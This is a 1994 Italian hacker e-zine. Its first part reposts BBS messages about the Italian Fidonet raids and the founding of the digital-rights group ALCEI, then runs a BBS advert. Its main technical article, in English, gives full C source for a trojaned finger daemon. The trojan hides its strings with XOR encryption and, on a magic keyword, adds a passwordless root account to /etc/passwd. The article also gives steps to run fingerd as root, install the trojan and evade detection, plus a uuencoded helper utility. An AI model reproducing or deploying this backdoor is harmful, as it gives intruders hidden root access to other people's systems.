operators have nothing to do with the charges, we'll verify it as soon as
possible," Pedrocchi said.
Fidonet prohibits the distribution of copyrighted software and secret
passwords, as does Peacelink, another system whose main node was similarly
raided several weeks after the Fidonet seizures.
"The software pirates are a lot more hidden than an obviously public network
like Fidonet," said Franco Mulato, president of the Fidonet Association of
Italy.
"This is a prime example of what happens when ignorant law enforcement butts
heads with the online world," said Stanton McCandlish of the Electronic
Frontier Foundation. "This is why getting police and other agencies up to
speed, not to mention updating the law, is so important."
Unfortunately, the Italian laws that were updated earlier this year to prohi-
bit software piracy and copyright infringement continue to hold sysops respon-
sible for any activity on their systems. Activists hope that when the dust
clears from the raids, the relatively new Italian online community will unify
to lobby for electronic civil rights laws by forming an Italian EFF-type orga-
nization.
"Even in Italy, electronic citizens are showing up," said Bernardo Parrella,
US correspondent to Agora Telematica, Italy's equivalent to the Well. "The
protection of civil rights is not a negotiable issue in a modern democracy."
At press time, Italian courts were beginning to return the seized equipment.
-- David Pescovitz
603 10-Lug-94 17:51 1370 B.Parrella USA Oakland CA 602
-----------------------------------------------------------------------------
Sicurezza e telematica.
I piu' efferati crimini mafiosi, dagli omicidi dei magistrati allo spaccio di
eroina e cocaina, vengono realizzati grazie all'uso di una fitta rete di
telefoni cellulari: si e' forse criminalizzato la SIP per questo?
Sia il crimine organizzato che la deliquenza comune fanno largo uso delle
tecniche di intercettazione delle radio-frequenze della polizia: si e' mai
scritto che le Poste debbano essere colpevoli?
Ogni giorno migliaia di lettere, pacchi e telegrammi anonimi (contenenti
minacce, testi atti a delinquere, perfino bombe) viaggiano su aerei e furgoni
dei servizi postali mondiali: si e' forse deciso d'incriminare gli addetti a
tali servizi?
Certo, c'e' di che preoccuparsi dell'intrusione nei sistemi radar aerei -
esattamente come c'e' da preoccuparsi per i casi sopra riportati.
E, ripeto, i materiali "terroristici" in questione non arrivano solo sulle
scrivanie dei giornalisti, ma molto piu' semplicemente sono disponibili a tut-
ti sia su supporto cartaceo che elettronicamente.
In nome della sicurezza sociale, possiamo discutere le regole della
comunicazione globale, finanche a cambiarle - se riteniamo che la telematica
sia un medium piu' pericoloso di altri. Ma allora, in piena buonafede, abbiamo
prima di tutto il dovere di allargare il dibattito, esaminando con attenzione
ogni possibile implicazione e conseguenza.
[ N.d.R. Questi 2 che seguono sono proprio pazzeschi ! ]
693 4-Ago-94 23:08 1611 C.Gerino I Roma
-------------------------------------------------------------------------------
INFORMAZIONE E SICUREZZA
Purtroppo, le notizie di ieri sulla "pericolosit delle reti informatiche
internazionali" non sono invenzioni giornalistiche, ma la relazione semestrale
del ministero dell'Interno al Parlamento sullo stato dei servvizi segreti e
della sicurezza in Italia. Un documento ufficiale, quindi, a carattere
internazionale, che esplicitamente parla dell'attivita' della sinistra
all'interno delle reti informatiche e della telematica internazionale. Piu' in
generale, sostiene che su queste reti transitino informazioni "pericolose per
la sicurezza nazionale ed internazionale" e che attraverso queste reti c'e'
chi "acquisisce informazioni riservate". Insomma, il massimo organo di preven-
zione e repressione getta l'allarme sull'informatica. Alcune cose sono proba-
bilmente vere (mi risulta che inusa, attualmente, esistono diverse Bbs che o-
perano come ""piazzisti" di eroina...)
Altre, pero', evidentemente hanno scopi diversi, come quello di far temere che
la telematica amatoriale sia un rischio per la sicurezza, con il corollario
che l'unica telematica affidabile sia quella "privata" commerciale o dello
stato...
C'e' lo zampino di qualcuno che ha molto a cuore i sistemi informativi, la
proprieta' di essi e la loro gestione esclusiva... Per quanto riguarda il fat-
to che la notizia sia uscita sui giornali, e' stata un'anticipazione fatta da
diverse agenzie di stampa (Ansa, Agi, Adnkronos) del documento, il cui testo
completo sara' disponibile pero' solo a settembre. Sono andato a cercarlo alla
Camera per leggere su cosa erano suffragate queste notizie, ma il volume e' in
stampa...
605 11-Lug-94 10:40 3182 S.Pasquini I Civitavecc 601
----------------------------------------------------------------------------
Salve,
sono qui con il dott. Berghella che rispondera' direttamente al tuo messaggio
nonostante il mio nome in testa.
Ciao
Stefano
------------------------------
Salve, sono Fulvio Berghella,
Mi associo volentieri al dibattito, soprattutto perche' e' firmato con nomi
reali. Ed e' proprio qui il punto. Quando c'e' buona fede nel dibattito libe-
ro, penso che le persone dovrebbero sempre qualificarsi. Se si nascondono die-
tro pseudonimi o alias evidentemente ci sono motivazioni particolari. Sul caso
specifico, avevo concluso l'articolo - peraltro scritto e predisposto nei
giorni precedenti il dibattito al parlamento - affermando che tali eventi
(riferendomi ai BBS clandestini) non aiutano l'immagine dei BBS ufficiali e
amatoriali autodisciplinati. Poi ho cambiato il finale perche' avevo sostenuto
pubblicamente la stessa cosa. Affermando all'auletta parlamentare che non
bisogna confondere i BBS amatoriali "puliti" che tanto hanno contribuito allo
sviluppo dell'informatica e telematica (gratuitamente) con l'enorme gruppo
clandestino che diffonde informazioni strane...
Comunque, credo che il problema di fondo sia l'informazione reale. Sappiamo
tutti che negli Stati Uniti esistono pubblicazioni che raccontano cose simili,
ma voi sapete quanti ragazzi in italia fanno o cercano fare degli illeciti so-
lo per avere tale materiale? Peraltro il file che descrive come fare la bomba
atomica, a detta di un esperto nucleare che lo ha esaminato - e' pericoloso
per come impostato. se qualcuno ci provasse potrebbe provocare un'auto esplo-
sione.
Non si tratta di fare terrorismo informativo. Se fosse stato quello il motivo,
la notizia avrebbe avuto maggior risalto, sarebbe stata affidata a giornali a
maggior diffusione popolare e non ad una rubrica specializzata come le pagine
informatiche de IL SOLE 24 ORE del venerdi. Infatti sia la televisione di
stato, sia la radio mi avevano chiesto di fare un servizio sull'argomento e
non accettato. Non ho accettato perche' in questo momento c'e' molta
strumentalizzazione sulla materia. Due fasi avrei fatto il servizio, oggi no.
In merito all
Correggo.... Due mesi fa (non due fasi....) avrei fatto il servizio oggi no.
Comunque io penso che chi come te, e come me, amano la libera circolazione
delle informazioni, debbano assumersi la responsabilita' di quello che scrivo-
no e che fanno, proprio per difenderne la liceita' e la liberta'. proprio per
rendere il dibattito pubblico non attaccabile. Tacere sui raggazzini che
imperversano con piccoli affari illeciti o accettare gruppi anomali e tacere
su organizzazioni pirata le cui dimensioni e i cui effetti sono assai piu cor-
posi e pericolosi di quelli narrati sull'articolo non penso faccia bene a nes-
suno.
Ora, per ragioni di tempo non posso continuare comunque gradisco molto il
dibattito, e le repliche anche a voce e a viso a viso. Un richiamo finale,
oltre la cronaca ci sono contenuti veramente pericolosi ed essi sono
regolarmente scambiati nei circuiti citati dove l'APPARENTE bisogno di far
circolare le informazioni liberamente e' VERAMENTE SOLO APPARENTE. Se non ne
fossi stato certo, non avrei mai scritto quell'articolo. Grazie per le
osservazioni, a presto.
FB
[N.d.r. questo qui e' proprio PAZZO !!! P-A-Z-Z-O !!! La Redazione consiglia
al Sig. Berghella una seduta di ascolto del Modulo Musicale "BERGHELL.MOD" ]
-----------------------------FINE MESSAGGI-------------------------------
Beh, questo sembra essere tutto, per ora. Sicuramente mancheranno delle
cose, ma sicuramente ce ne troverete altre che non sapete, come magari alcuni
messaggi letti in area SYSOP che 'normalmente' un comune utente non potrebbe
leggere :)
Per finire alcune informazioni relative all' ORGANO :) che "DOVREBBE"
tutelare i diritti telematici di noi pazzi telemaniaci. Dico DOVREBBE perche'
per esempio anche la Associazione Fidonet Italia (AFI) avrebbe dovuto tutelare
i Sysop aiutandoli in qualche modo, ma invece se ne e' letteralmente
F-O-T-T-U-T-A lavandosene le mani.
799 26-Ago-94 02:31 3739 B.Parrella USA Oakland CA
----------------------------------------------------------------------------
Comunicato ufficiale: nasce ALCEI - EF Italy.
Questo il comunicato ufficiale che annuncia la nascita di ALCEI - EF Italy.
Per ulteriori informazioni ed iscrizioni, rivolgersi direttamente
all'indirizzo sotto riportato - continuando invece ad usare questo spazio per
la discussione in tema di community networking ed argomenti relativi.
-----------
=====
ALCEI
=====
Electronic Frontiers Italy
--------------------------
*E' nata l'associazione per i "cittadini elettronici"*
------------------------------------------------------
Mai pensato che il nostro computer potrebbe aver problemi di liberta'?
E il nostro modem voglia di riservatezza?
Eppure ne hanno, cioe': li abbiamo noi. Quasi senza accorgercene, leggendo e
scrivendo messaggi, usando forme nuove di comunicazione, siamo diventati
un'altra cosa. Siamo "cittadini elettronici". Ma "quanto" siamo liberi? Quan-
to abbiamo gia' "regole" adeguate alla novita' che viviamo e rappresentiamo?
I recenti sequestri in Italia, il ricco dibattito che negli Stati Uniti si sta
sviluppando intorno alle autostrade elettroniche, la lentezza e le incertezze
che caratterizzano l'affermarsi di un analogo progetto europeo, le trasforma-
zioni tecnologiche e d'uso che l'insieme dei media va conoscendo, indicano un
terreno di iniziativa per la difesa e lo sviluppo dei diritti di cittadinanza
telematica come parte dei diritti democratici.
Per questo e' nata:
*************************************
ALCEI
-----
Electronic Frontiers Italy
Associazione per la liberta' nella
comunicazione elettronica interattiva
*************************************
Alcei nasce per dare la parola al cittadino elettronico. Alcei si richiama di-
rettamente all'esperienza di Electronic Frontier Foundation e di EFF ha il ri-
conoscimento pubblico e diretto.
Alcei non e' un'organizzazione di tendenza, non ha riferimenti politici o
ideologici, non chiede di essere finanziata dallo stato. Tutti vi possono
aderire, purche' ne rispettino lo statuto. A tutti chiediamo una quota
associativa e una collaborazione in qualsiasi forma: nessuno ci paga, non
abbiamo apparati.
Alcei non e' una "lobby". Non e' solo un gruppo di "difesa del consumatore".
Non nasciamo per aggiungere leggi a leggi, burocrazia a burocrazia: tutto cio'
che fonda sulla liberta' e sull'autoregolamentazione, sui codici che i sogget-
ti sociali sanno darsi autonomamente, funziona bene.
Con questo principio intendiamo muoverci su casi singoli cosi' come su terreni
generali: il diritto e la legislazione, che sono incompleti, l'informazione
che e' oggi del tutto assente, carente o imprecisa (e spesso pilotata da grup-
pi di interesse); l'elaborazione di una cultura dei nuovi mezzi.
Alcei non e' una "conferenza", un luogo solo di dibattito. E' e vuole essere
un'organizzazione operativa che lavora con pazienza, tutti i giorni, per co-
struire e difendere la libera cultura della telematica.
C'e' un grande vuoto da riempire, di idee e di lavoro.
Per ottenere un'adesione informata abbiamo creato un punto di riferimento
telematico dove potrai chiedere informazioni sulla nostra identita' e sui
nostri principi. Presto saranno pronti nuovi strumenti di circolazione
dell'informazione cui tutti potranno dare un contributo.
---------------------------------------------------------------
Per informazioni: <alcei@mailbox.iunet.it>
(fax: 06-3202346 o 02-867055)
---------------------------------------------------------------
809 26-Ago-94 20:30 953 B.Parrella USA Oakland CA
----------------------------------------------------------------------------
re: comunicato alcei
In merito al *comunicato* precedentemente inserito, rammento che ulteriori
informazioni (statuto, dichiarazione di principi, modalita' d'iscrizione, ecc.)
vanno richiesti all'indirizzo menzionato <alcei@mailbox.iunet.it>. Tali
documenti possono anche essere ricevuti automaticamente, come specificato
nelle seguenti righe che erano saltate nella prima comunicazione ufficiale.
--------------------
La documentazione su ALCEI puo' essere richiesta al server ftpmail
archive@nexus.it
Per informazioni sull'uso del server ftpmail inviare ad archive@nexus.it
un messaggio contentente la parola HELP nel corpo del testo.
---------------------
Ricordo inoltre che EFF sta per Electronic Frontier Foundation (negli USA),
mentre il "secondo nome" di ALCEI e' Electronic Frontiers Italy. Infine,
LECITI! era un'idea-proposta mai concretizzatasi ma il cui spirito (oltre a
qualcos'altro :-) si e' riversato proprio in ALCEI.
----------------------------------------------------------------------------
Speriamo che questa ALCEI possa ingranare subito, senza entrare a far
parte della RUOTA BUROCRATICA che da sempre blocca, invece di muovere, qual-
siasi iniziativa.
Dupree's Paradise
-----------------------------------------------------------------
PUBBLICITA' REGRESSO
====================
CALL NOW
The BEST BBS for Cyberpunk & HP Stuff in Europe !!!
________________________________________________
/~ .~ / _ . ~/~ _ . |~ __ ~| _ . \~ _ _ ~/
// ____/_ |_\__/. | \__|. |__| | |_\__/\/ | | \/
/____ ~/ _|__|| | __|: _| _|__ || |
// . //: |_/. \: |_/. || |\ \\: |_/. \ |: |
/_____ /|________\______|__| \__\_______\ |__|
___________________________________________ ___________________
\~ _ _ ~/ _ . ~/ _ .\~ _ _ ~/ __ |~ ~\ |~~|~| _ . ~/~ .~ /
\/ | | \/ |_\__/ | \__\/ | | \/ / \|| \| || || \__// ____/_
|| | || _|__| | __ || | \\ \ /|: \ \ :| || ______ ~/
|: | |: |_/. \ |_/. \ |: | \ \/ || |\ .| ||_/. \/ . //
|__| |________\______\ |__| \____|__| \___|_|______\___ /
Dialup: +49 40 823326 8N1 with a USR Dual - NUA 26245400050045
Donations are very welcome, leave Mail to Seven Up (you may use CC's!)
NEWS From Sectec :
==================
We just set up the Official SECTEC FTP site on the Internet!
It is on spy.org in /pub/SECURITY/sectec.
All uploads go to /pub/SECURITY/sectec/incoming please!
This is a way for all the people with Internet access, who would like
to contribute files but cannot upload through x.25 yet...
To help you uploading here, I just installed ASCII Upload and
UUencoded Upload (which are basically the same!). You just chose this
point from the Upload menu and chose ASCII Upload with your terminal
program. For security reasons, uuencoded files aren't uudecoded
automatically, but will remain online uuencoded.
Also I just created a general Newsgroup called "chat" as requested.
For all the people who want to talk, get a better message ratio -
just talk about whatever you want and what wouldn't fit anywhere else.
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 4
The
fingerd
TROJAN HORSE
============
by
Hitman Italy
[ N.d.r. Articolo in Inglese. Se lo capite, bene. Se no, adeguatevi e
datevi una svegliata, che siamo nel 2000 !!! ]
[ N.d.R QUESTO ARTICOLO VIENE PUBBLICATO COME INFORMAZIONE PER I
SYSTEM ADMINISTRATOR AFFINCHE' POSSANO PRENDERE VISIONE DI
QUESTA DEBOLEZZA NEI SISTEMI UNIX. ]
-=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=-
The fingerd trojan horse
Original article by Hitman Italy for The Black Pages
This article is for informational purpose only, I'm not liable for
any damage or illegal activity perpetrated using the source or the
informations in the article.
-=- + -
So you have gained access to a system and want to keep on hacking without
being kicked off by a smart operator, there are dozen methods you can use,
usually, if an operator figure out that his system is under attack, he'll
check out the login program and telnetd for backdoors, then the telnet for
logging activities or network sniffers and so on.. if nothing is found
he'll realize the hacker is a dumb ass and he'll just modify the passwd to
prevent him from logging in (most of cases), here comes my fingerd trojan.
This scheme is quite original (I've never heard about it) and the source
compact enough to be fitted into a MAG. The fingerd as all you know (I
hope) is the finger server run by inetd when a client opens the finger
port (N.79), of course if the port is locked, or you have a network
firewall, do not use this code.
---------- + CUT HERE + -----------------------------------------------
/* The Fingerd trojan by Hitman Italy
* This source cannot be spreaded without the whole article
* anyway you can freely use or modify it for your own
*/
static char copyright[] = ""; /* Add the copyright string here */
static char sccsid[] = ""; /* Add the sccsid string here */
#include <stdio.h>
#define PATH_FINGER "/usr/ucb/finger"
#define CODE 161
char *HitCrypt(ch)
char *ch;
{
char *b;
b=ch;
while ((*(ch++)^=CODE)!=0x00);
return(b);
}
main(argc,argv)
int argc;
char *argv[];
{
register FILE *fp;
register int ch;
register char *lp;
int p[2];
static char exor[4][23]={
{201,200,213,CODE},
{142,196,213,194,142,209,192,210,210,214,197,CODE},
{201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194,
210,201,CODE},
{227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197,
143,143,143,CODE} };
#define ENTRIES 50
char **ap, *av[ENTRIES + 1], line[1024], *strtok();
#ifdef LOGGING /* unused, leave it for "strings" command */
#include <netinet/in.h>
struct sockaddr_in sin;
int sval;
sval = sizeof(sin);
if (getpeername(0, &sin, &sval) < 0)
fatal(argv[0],"getpeername");
#endif
if (!fgets(line, sizeof(line), stdin))
exit(1);
av[0] = "finger";
for (lp = line, ap = &av[1];;) {
*ap = strtok(lp, " \t\r\n");
if (!*ap)
break;
if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
*ap = "-l";
if (++ap == av + ENTRIES)
break;
lp = NULL;
}
if (pipe(p) < 0)
fatal(argv[0],"pipe");
switch(fork()) {
case 0:
(void)close(p[0]);
if (p[1] != 1) {
(void)dup2(p[1], 1);
(void)close(p[1]);
}
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
if (av[1])
if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) {
if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a")))
_exit(10);
fprintf(fp,"%s\n", HitCrypt(&exor[2][0]));
printf("%s\n", HitCrypt(&exor[3][0]));
fclose(fp);
break;
}
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
if (execv(PATH_FINGER, av)==-1)
fprintf(stderr,"No local finger program found\n");
_exit(1);
case -1:
fatal(argv[0],"fork");
}
(void)close(p[1]);
if (!(fp = fdopen(p[0], "r")))
fatal(argv[0],"fdopen");
while ((ch = getc(fp)) != EOF) {
putchar(ch);
}
exit(0);
}
fatal(prg,msg)
char *prg,*msg;
{
fprintf(stderr, "%s: ", prg);
perror(msg);
exit(1);
}
--------- + CUT HERE + ----------------------------------------------
I think it's quite easy to understand, first of all, inetd opens the
socket and pipes the the input data through the fingerd
* if (!fgets(line, sizeof(line), stdin))
* exit(1);
* av[0] = "finger";
* for (lp = line, ap = &av[1];;) {
* *ap = strtok(lp, " \t\r\n");
* if (!*ap)
* break;
* if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
* *ap = "-l";
here it gets the data from stdin and parses them (strtok) converting (due
to RFC742) any '/W' or '/w' old options in '-l'
* switch(fork()) {
* case 0:
* (void)close(p[0]);
* if (p[1] != 1) {
* (void)dup2(p[1], 1);
* (void)close(p[1]);
* }
the task goes into the background
* if (execv(PATH_FINGER, av)==-1)
* fprintf(stderr,"No local finger program found\n");
here the daemon executes the local finger with remote parameters
* (void)close(p[1]);
* if (!(fp = fdopen(p[0], "r")))
* fatal(argv[0],"fdopen");
* while ((ch = getc(fp)) != EOF) {
* putchar(ch);
the output is piped back to the remote system
That's how the finger daemon works... now the trojan, basically we'll
check out the input finger user till the magic code matches, then our
sleepin' trojan will wake up and do the job... let's examine my code
(decrypted)
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
if (av[1])
if (strcmp("hit",av[1])==0) {
if(!(fp=fopen("/etc/passwd","a")))
_exit(10);
fprintf(fp,"hit::0:0::/:/bin/csh\n");
printf("Backdoor activated...\n");
fclose(fp);
break;
}
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
When the "hit" magic code matches the trojan will modify the passwd adding
a fake unpassworded root user named "hit", so you can relogin as root,
cover your tracks and keep on working. Of course this is an example, you
can do what you want simply adding your custom code, you may remote cat a
log file without logging in, or remote kill an user, maybe root logins are
disabled so you have to make a suid shell and add a normal entry in the
passwd or open a port and so on, you can also use multiple codes if you
like. If the magic word doesn't match of course the finger will work out
normally.
<example>
# finger hit@666.666.666.666
[666.666.666.666]
Backdoor activated...
Well done! You have gained a root access.
(...)
# cat /etc/passwd
root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
ingres:*:7:7::/usr/ingres:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
+::0:0:::
hit::0:0::/:/bin/csh
^^^ they run NIS... anyway our local root login will work fine
<example>
#finger hit@hacked.system.com
[hacked.system.com]
here is the log
user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001
user: yit001 from: (...)
That's really useful to collect logfiles without logging in and leave
tracks everywhere.
Now the problem....
If you want to use the fingerd to run world accessible commands you won't
have any problem but if you require root privileges check this out:
#grep fingerd /etc/inetd.conf
finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd
^^^^^^
On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with
NFS etc..), as nobody of course you cannot modify the passwd, so edit the
file
finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd
now you have to refesh the inetd process
#kill -HUP <inetd pid>
now you can do what you want, many unix clones let the fingerd running as
root by default... and even if you have to modify the inetd.conf an
operator unlikely will realize what is appening since all other daemons
run as root.
Why have I crypted all data?
#strings login
(...)
Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...)
Lame or not? All alien data must be crypted.. a fast exor crypting
routine will work fine, of course you can use the standard crypt function
or other (slow) algorithms but since security is not important (we just
want to make our texts invisible) I suggest using my fast algo,to create
the exor matrix simply put all texts on a file and use the little
ExorCrypt utility I have leaved UUencoded below (amiga/msdos version).
<example amiga>
echo > test "this is a test"
Acrypt test test.o
line crypted: 1
type test.o
static char exor[]={
213,201,200,210,129,200,210,129,192,129,213,196,210,213,161};
char *ExorCrypt(ch)
char *ch;
{
char *b;
b=ch;
while ((*(ch++)^=0xa1)!=0x00);
return(b);
}
The utility will create the exor vector (matrix) (from the 80 column
formatted ascii input text) and the specific decoding function, If you do
not supply a key "$a1" will be used, remember to add a NewLine if
necessary, the vector/matrix never contain them.
Before compiling the whole thing you must add the copyright and sccsid
strings I have not included (they may vary).
Let's simply do: (SunOs)
#strings /usr/etc/in.fingerd
@(#) Copyright (c) 1983 Regents of the University of California.
All rights reserved. ^^^^ COPYRIGHT STRING
@(#)in.fingerd.c 1.6 88/11/28 SMI <<<< SCCSID STRING
getpeername
finger
pipe
/usr/ucb/finger
No local finger program found
fork
fdopen
%s:
(((((
DDDDDDDDDD
AAAAAA
BBBBBB
The top of source becomes:
static char copyright[]=
"@(#) Copyright (c) 1983 Regents of the University of California.\n\
All rights reserverd.\n";
static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI"
That's all. Now you can compile and install your fingerd trojan,
the source was adapted for SunOS but you can port it on many unix
clones without troubles.
Few final words to:
Operators: How to defeat this trojan? First of all check the inetd.conf,
then do VARIOUS fingerd checksums (maybe even the "sum" command
is a trojan :) if you discover the trojan wrap the finger port
so you can track down the hacker (usually all wtmp/lastlog logs
are removed) or wrap everything modifying the daemons, do NOT use
the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd
tripwire entry to prevent future installations.
Well... if the hacker is a good one everything is useless.
Beginners: You must be root to install the trojan, remember to get a copy
of the original fingerd program before installing the fake
version.
On a Sun do:
#cc -o in.fingerd trojan.c
#mv /usr/etc/in.fingerd fingerd.old
#mv in.fingerd /usr/etc
remember to check the /etc/inetd.conf
-=- + -
To get in touch with me E-Mail to:
Internet: hit@bix.com X.25: QSD Nua (0)208057040540
Mbx: Hitman_Italy
if you want, use my PGP key
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a.2
mQCNAiypAuIAAAEEALVTvHLl4zthwydN+3oydNj7woyoKBpi1wBYnKJ4OGFa/KT3
faERV90ifxTS73Ec9pYhS/GSIRUVuOGwahx2UD0HIDgXnoceRamhE1/A9FySImJe
KMc85+nvDuZ0THMbx/W+DDHJMR1Rp2nBzVPMGEjixon02nE/5xrNm/sb/cUdAAUR
tBpIaXRtYW4gSXRhbHkgPGhpdEBiaXguY29tPg==
=bCu4
-----END PGP PUBLIC KEY BLOCK-----
ExorCrypt Amiga version:
-=) S.Encode v2.5 (=-
begin 777 Acrypt.lha
M'$0M;&@U+;L7``"`*```4K>9`0``!D%C<GEP=`X]$UF#^]?>]8TV]?OWWGY]h
MWCGT)T<>==;,3^G7FQMOA\XXX4Q2S[GS9)QP]W.-A<]))-Y@SN9!MOMPPCA"h
MGWF(`+"*XDE5UEU4LU45L4CDCA958FA%94*5RX4P217"J%868`=M85QPS1@<h
M/?_]_O>YL*2RW3+[;9:U9+);_%OP`;\%'W=VLD<;;A%.>^3?Y5SVH19P?5/Zh
MA=_F.G`BP"T_^)W7<CS.<^82-**GE,*TW![K%:RX-^2U1'6@U$A:NB8*U937h
MBE!+)^,'6%']'I^Q4:\OJ+4\;SRP91%+1U^]](EG3(`+-1#G.A;DI5HUY8/%h
MQ>+BO[DGWM>O[7KH5F%/_)J-.MI>)@6C,25:,JPVNG]?$U3,3P5R0K:L^W@=h
MEOB)!6NV&@<KLM^2#I]EZ:!9]U^%KH/Y$+.,$5^!WI)SH2__MHSQ<$Q67WZ_h
M]!=Z-*LN>_%J(:U9"*!#14E`E3\&Z=7*(;^G(JBO6IX_HM;9_4DB51P!LV<Yh
MHK^Z,?HY3SE;M$/07)+EYB+H9]>+=3G/1<E`J+DEEM+'PUM''PWGJ2R861")h
M:$2(*R)2R(<?>Q\.AX9DQ?@4@?ZL8O.Q@3651OX(#*P$?'._'O:/P&Q@]RCLh
MJNZ6KH^QEW#'J6'1)]+!5_@XU1#=7,K'C[&XO=A5W6NU<RWF>$4?5-,_>QYSh
MH:TNP?Q>8[K:N$7ETUZ7F;0HGH-<FDVA?UM,RYS@,W;J6MP&;VCBW1%'PYS*h
MJ_(%&M&B[:)_3'PZ396<@5V(54-#X=%R;.0"/O),^+,:OG,6+?D\&%LTX7<Ch
M"KC"\"SD54-KH1F4X?=C#^6YAZ>SD&+9,`8E['P^SV]M(I(;3,8DXGT1B=DWh
MB:/IV<B$\%.SBW;0)31U<C])/8S,K/6FY;L>P6MC$N-A#9M[[8H\ECV):F_9h
MDD7XP"^&WA9^R/V*_NPM"UT(^'\CW995;,(H0$?R,[5^)FB'Y/#`A@2R`)QQh
M]Y#=J^\JVD:IE_H6L??,WEP^T+3/I]M1;U\/H27*$H`SRQB<`:/]T]0VGH-<h
MA[Z`31[!KD`J8N1@?SN#N2>!!?>0Q0.7.0Y<V3F;QV-W+(Q+"(7O/<O4[[8)h
M2R1H6N3:'KUT+WHN$'\!O<*E"YC2S=PT,$]I[,D.K5G#9O"4>=4J=%^,PO+)h
M%VUT+7S2>GO5%.99=?0A7];^/\Q*=G'):7X<^R>[6,Z$W;\O#"9^ILY#\T1\h
M=L$]??_O)*I1MDE?;__\253/MZ_H8?ZR2J0'+FFS22M[1NJ/-):I3N84DDMHh
MNI<U;=S_!RTY_<,%T\@6NB<M>(*>C<I\(4X[E/U13[MRG@BGW[E/RQ3NG*?Th
MFQ+5LBSV3EF=/ZKE.^%/SG*=R![%2E#G3-^H$[2Y]G(8>IJX@J\NSD67N67(h
MC]]'V(6+V,?8A;>L"V]$%M\]!##J$[CX?\/BVS:P:TMIC1+U)3A3DI\#+JQ/h
MM'?S_FGN6$ZA3T*I2MFN=>I(,67LH\FJB=LO<>\@Q&W^EV\7F3CX"-\C41J*h
M3EVN[\;^R"OM2S])&W4JMM<%7/W="BZ5H;#&)2HTZM"AV^;0/XZ'9^XMTK/Ph
ME(^&OVYH*L>L=>+?M-"Q@V<A#JR]Q?$FBV7;ADOQXO,Z^L`OL=H5?S0CO%:Rh
M0*W<H)/RZ7@$%P>'GZ0%9=S*+OJ_7D6[PO#?+R>?'Z3Y8K@-R[,K\>:,I8\Th
M!;`>50F'DP+8P2Q&.G3T1T]-S6L?9NXVXU]"A:9U^)@5_1+$XN)0;VU\3&V]h
MKN&.7$T+7-8H\W'PE@CCRH^'UU_9R!F^4:H?3Y-M(X[+!-=_:;E)"Z+XR%DUh
MVYZQ20L-1W=:DA9-4_[LJOU<JZRV\KT\G-*&ZQ@4'FO<AKA&@O6=I6]K7=MHh
MOEZ/^*OL+'3=P"H@I_"B\S0&4_O8%Z3&U+:%LPP##>%#72F%55[65?-541K)h
MK^:UQ`UM]X?<L6O)'W&&]>'&[&5$&A>Q26W1I+7E)+7\I@WK"!YH2JAY>EH3h
M+7M5&,[M%&'FS48=`2J-9=IO&,,9^LPE)+JTWE)7M=*74X78R7R+0;Q6@?0Jh
MK-K*SH*[E0IZ/AO0XO_NQ!D:L9&FM-Y\6-R7,;DIQK]S&W0QKQ(Q]X7Z\Rh
MY%=6TWCZD,I8VKD2ZSOH>O)74[[PR2A>2Q:Q@E:DT(U,8K8>=J:':E^:':G?h
ME>CR]+8C:ONI195C:%KWI3V;HE#YAYFTS<,W3R8I8AD"9.XWH-8P51T+#R,Zh
M'NJ85EH&A>("EN@T+QMLR*,[MF92X99\,?>2&!../O##4'9I>1XH;HY,9GP'h
M4Q0!')%7%&9R?'9B\TE6N%>U82;X;^+[7!85G^-:LW'12QOZ0P?".Y85?8EKh
M@7'1,"F#>*!&9Y4G5-4^S;0%&Y>X_?MD)%ZO]^#%_ERI\QR^RRK$ZSY)BL.;h
M4[5SGMM[5-/<#FL:Z4W;\M<6^3_T'Z&:'Q]OYBOQ"/";$<NVPM"UD22Z?`"$h
M_$#&NVMI`4YPIH1?V=5IVN')7"^?'//F%7&;O-:X8L>2WIO7U/IXE[3)@/T2h
MU#]YNDS.:&$?%8="&_(O%-[^"]Y6^9NE[X@JGE,+>-Z#64"UZ*U!>[NB2]-Xh
M;ZBA$V,R?1]Z-+^Z+W*NXK9O0W(FV^,FWG_CM_]@:B>#<'DN.)]4UE1>8H:_h
M^?"_[^J&%:RL_1C2=<EJ:_PI^2M:>(Q1PIY*O[RW+I'!UF_OZ,I:!#8]DV08h
M8_^0`WZP#+)AD!?(B\SLZT!>"]P0QH1.X8B(MR%AT82DI[,S@\NICP+!K!8Wh
M$6Y1!G</E,VF#.X=?CSOW^+B0(LM^%V0O#`W@OWAU91XW)C=C)>AUF'&KJh
M"!KY42D8^JG!T3@??)#[PP^G(\D9%5AT,.34R,!#)='&WL+&*:B+.\!-GM*_h
MHJ0+#'G67_&;_UN].,Y1KB@`6T\*G):+=3K(&MX9`:\\2NF/1YT%,<*F/5L1h
M]LIBPC]XHHZD>[/E,^1ZYQQ8)GD".'_+Y#^'\I,?OM3B,^>Q4N`'\)@$>^h
